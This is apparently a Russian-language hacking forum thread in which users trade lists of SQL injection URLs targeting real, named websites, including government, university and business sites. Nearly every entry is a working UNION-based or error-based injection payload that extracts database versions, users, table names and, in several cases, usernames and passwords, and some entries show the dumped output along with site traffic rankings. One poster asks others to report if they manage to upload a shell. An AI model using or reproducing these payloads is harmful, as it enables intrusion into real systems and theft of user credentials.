http://azembassy.pl/pl/index.php?section=-11+/**/union/**/+/**/select/**/+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),d atabase()),10,11,12,13,14+--+
Вывод в title
5.5.30:azembassy_hotcom@hotcom.pl:azembassy_hotcom
novostimira.com
PHP:
http://novostimira.com/videonews.php?act=view&id=49175%27+or+1+group+by+concat%28%28select+versi on%28%29%29,0x00,floor%28rand%280%29*2%29%29having +min%280%29+or+1--+
5.5.15
(CY) 550
(PR) 5
==============================================
newizv.ru
PHP:
http://www.newizv.ru/forum/?SectionID=1&ThreadID=33878+or+1+group+by+concat%28%28select+ve rsion%28%29%29,0x00,floor%28rand%280%29*2%29%29hav ing+min%280%29+or+1--+
5.1.66-log
(CY) 12000
(PR) 7
==============================================
http://
www.warrenhouse.com/event.php?id=-163+union+select+1,2,3,4,5,6,concat_ws%280x3a,user %28%29,database%28%29,version%28%29%29,group_conca t%28table_name%29,9,10,11,12,13,14,15%20from%20%20 information_schema.tables%20where%20table_schema=% 20database%20%28%29
==========================================
http://caeff.ces.clemson
.edu
/content/?id=-3+union+select+1,file_priv,3,4+from+mysql.user--
File_prive Y
justonline
17.05.2013, 19:07
http://www.strategy-spb.ru/index.php?do=biblio&doc=-76+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,version(),user(),database()),14,15,16,17,1 8+--+
5.1.49-3:lacaoru_strateg@localhost:lacaoru_wwwstrategyspb ru
(CY) 400
www.planetgarth.com/news/article.php?cid=-01015+union+select+1,2,3,4,5,6,concat_ws(0x3a,user id,username,password,salt),8,9,10,11,12,13,14,15,1 6,17+FROM+user%20limit%205,1--
Все-таки часть технического ВУЗа-могли бы как следует защитить!
http://
www.sportclubmai.ru/heading/5/index.php?group=sec/4/5&id_top_name=-4+union+select+1,concat_ws(0x3a,user(),database(), version())--
==========================================
http://
www.novagora.net/rub.php?Rub=3&IDR=-1+union+select+1,2,concat_ws(database(),user(),ver sion()),4,5--
==========================================
http://
www.martine-rupert.com/eng/pola.php?id=-246+union+select+1,2,concat_ws(0x3a,table_name,col umn_name) from information_schema.columns
==========================================
http://www.muncip.ru/a/news.php?id=-2+union+select+1,version(),3,4,5,6,7,8,9
тиц 30
http://
www.solmaravenidacenter.com/lojas/ver.php?id=-59+union+select+1,2,user(),version(),database(),6, group_concat(0x3a,table_name),8 from information_schema.tables where table_schema=database()
==========================================
http://postavy.startrek-petr.info/postava.php?id=6+union+select+1,2,3,user(),databas e(),6,7,8,table_name,10,11,12 from information_schema.tables where table_schema= database()
==========================================
http://www.goanews.com/archive_list.php?uid=3&am=8&ay=2010'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/concat_ws(0x3a,vUsername,vPassword)/**/from/**/users/**/limit/**/0,1),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
http://
endandend.com/sol.php?id=-18+union+select+1,2,3,group_concat(0x3a,column_nam e),5,6,7,8,9,10,11,12,13,concat_ws(0x3a,user(),ver sion(),database()) from information_schema.columns where table_name=0x656469746F7273 limit 0,1--
==========================================
http://
www.icha.org.uk/find-member-region.php?id=-9+union+select+group_concat(0x3a,user(),version(), database())--
==========================================
http://
www.predc.ca/region.php?pgid=-14+union+select+1,2,group_concat(0x3a,table_name), 4,5,6,7,concat_ws(0x3a,database(),user(),version() ),9,10,11,12 from information_schema.tables where table_schema=database()
==========================================
Philippine Information Agency
Правительственный сайт Филиппин. У каждого государства есть подобные косяки (к тому,что не стоит все время упрекать Россию,нужно ПОМОГАТЬ! ей).
http://
www.pia.gov.ph/news/gis/region.php?id=-3+union+select+1,2,concat_ws(0x3a,table_name,colum n_name),4,5,6 from information_schema.columns
==========================================
tagil748
24.05.2013, 23:27
Code:
http://gorlivka.biz/job/ind.php?id_gorod=343%20union%20select%20user(),2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31%20--
Code:
http://promar.tv/nueva/articulo_completo.php?id=-16821+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7,8,9,10,11,12,13--
Code:
http://promar.tv/nueva/articulo_completo.php?id=-16821+union+select+1,2,group_concat(table_name),4, 5,6,7,8,9,10,11,12,13+from+information_schema.tabl es--
Win32BOT
26.05.2013, 03:22
Code:
http://startingweb.ru/detaliat.php?id_pr=2+and+1=0+union+select+1,versio n(),3,4,5+--+
Current User: partyklub_1@localhost
Sql Version: 5.1.66-0+squeeze1-log
Current DB: partyklub_1
System User: partyklub_1@localhost
Host Name: s13.webhost1.ru
Installation dir: /usr/
DB User: 'partyklub_1'@'localhost'
Data Bases: information_schema
partyklub_1
Code:
ttp://www.careers.state.gov/survey/StateCareers/ThankYou.php?&&&&&&userid=-52+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8--
5.0.81:'survey'@'%':surveys
available databases [2]:
information_schema
surveys
Database: surveys
[2 tables]
+-------------+
| careeritems |
| careerpilot |
+-------------+
Table: careerpilot
[59 columns]
http://www
.nopasaran.perm.ru/vorota.php?id=-14+union+select+concat(version(),0x3a,database(),0 x3a,user())--
==========================================
http://www
.christlifeline.org/blog.php?id=-1+union+select+group_concat(0x3a,table_name) from information_schema.tables where table_schema= database()
==========================================
Code:
http://www.ajmci.org/actualite.php?id=-75+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7--
Code:
http://www.ajmci.org/actualite.php?id=-75+union+select+1,2,group_concat(table_name),4,5,6 ,7+from+information_schema.tables--
Code:
http://www.your-currency.com/anekdots.php?id=-12743+union+select+1,group_concat%28login,0x3a,pas s%29+from+piramida_users--
Code:
http://iacp.dvo.ru/lib/news/index.php?news_id=-69+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5--
тиц375, 7к трафф
Code:
ingrus.net/york/details.php?id=12743/**/and+1=0+/*!%75nion*/+/*!%73eLect*/+version(),1,2--
кто зальется стукните в лс обязательно!!!!!!
Code:
http://www.iactunis.com/actualite.php?id=-75+union+select+group_concat(table_name),2+from+in formation_schema.tables--
http://
www.ravenel.com/article.php?cid=40&list=-79+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()%29,8,9,10,11,12,13,14,15,16,1 7,18,19 --
==========================================
http://
bestsalebyowner.com/kod.php?id=-68200+union+select+group_concat(0x3a,id,ContactNam e,phone%29,2,3,4,5,6,7,8,database(),version(),user (),12,13,14,15,16,17+from+owners2 --
==========================================
Code:
http://www.ceripp.it/curriculum.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6--
http://
www.clovin.com.pl/shoppracz/show_region.php?id=-16+union+select+concat_ws(0x3a,user,pass),2,user() ,database(),version(),6 from login --
==========================================
http://www
.bransonparksandrecreation.com/park.php?id=-13+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_lo gin,user_pass,user_email) from wp_users--
==========================================
http://
www.beogradput.com/vesti.php?id=90+union+select+1,version%28%29,3,4,5 ,6,7,8,group_concat(0x3a,id,0x3a,username,0x3a,pas sword),10,11,12,13,14 from users --
==========================================
http://
hun.motonetsk.sk/karta.php?Id=-5766+union+select+1,version(),user(),4,5,6,7,8,dat abase(),10,11,12,13,14,15--
==========================================
http://
www.avis-nieruchomosci.pl/oferty/karta.php?id=-328+union+select+1,version(),3,4,5,6,7,8,database( ),10,user(),12,13,14,15,16--
==========================================
http://hold5.ru/news.php?news_id=-44/**/union/**/select/**/1,2,3,database(),5,6,user(),@@version,9,10,11
Code:
http://clubpodium.ru/index.php?section=2&id=-320+union+select+1,2,3,group_concat(table_name),5, 6+from+information_schema.tables+where+table_schem a=database()+--+
Win32BOT
29.05.2013, 19:59
Code:
www.capital-monitoring.ru/index.php?id_link=-1+union+select+1,user(),3,4,5,6,7,8,9+--+
http://
www.civitan.com/template.php?id=-14+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6,7--
==========================================
http://
www.caosciotocounty.org/template.php?id=3'+or+1+group+by+concat((select+ve rsion()),0x00,floor(rand(0)*2))+ having +min(0)+--+
==========================================
http://
www.nano-center.org/index.php?autor_id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,group_concat(table_name) from information_schema.tables where table_schema= database()
==========================================
Win32BOT
30.05.2013, 15:51
Code:
http://www.forumkuban.ru/firm_info.php?id=1510+union+select+version(),user( ),3,4,5,6,7,8+--+
ТИЦ 500
Внимание! Вся предоставленная информация исключительно для ознакомления! За совершенные вами действия я ответственности не несу!
http://
cyclesrault.com/promotion-velo.php?id=-75+union+all+select+1,2,unhex(hex(version())),unhe x(hex(database())),5,6,7+--+
==========================================
Win32BOT
31.05.2013, 16:17
Code:
http://www.japanphotoproject.com/book.php?idioma=-2+union+select+user(),database(),3,4,5,6+--+
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot